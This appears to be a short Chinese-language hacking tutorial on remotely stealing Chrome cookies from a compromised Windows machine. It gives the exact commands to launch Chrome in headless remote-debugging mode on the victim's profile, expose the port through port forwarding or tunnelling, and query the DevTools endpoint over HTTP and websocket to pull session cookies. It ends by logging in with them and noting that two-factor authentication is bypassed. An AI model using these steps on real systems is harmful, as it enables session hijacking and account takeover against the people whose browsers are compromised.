远程窃取Chrome Cookie
执行代码
"C:\Progra~2\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless --user-data-dir=C:\Users\Administrator\AppData\Local\Google\Chrome\USERDA~1 -remote-debugging-addres=0.0.0.0 --ignore-certificate-errors
- 然后使用端口转发或者内网穿透,使其公网可访问
- 比如:受害机9222端口转发到9221端口上
- 本地打开谷歌浏览器输入
chrome://inspect/#devices
- 点击 Configure,设置监听的端口,这里我选择的是 9221,然后点击 Done
- 如果对方访问网页,就能在这里看到访问的所有网页:
- 上线开启谷歌浏览器调试模式
execute -P 2184 "c:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless --user-data-dir=C:\Users\Administrator\AppData\Local\Google\Chrome\USERDA~1
- 端口转发
portfwd add -r 127.0.0.0:9222
- 将Chrome通过隧道连接
curl http://localhost:8080/jso
- 使用websocket 请求获取到的值
wsc ws://localhost:8080/devtools/page/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-
使用窃取的cookie凭证访问Web应用程序
-
注意:无论是否设置了双因素身份验证(在这里已启用),Cookie都可以提供访问权限。
评论区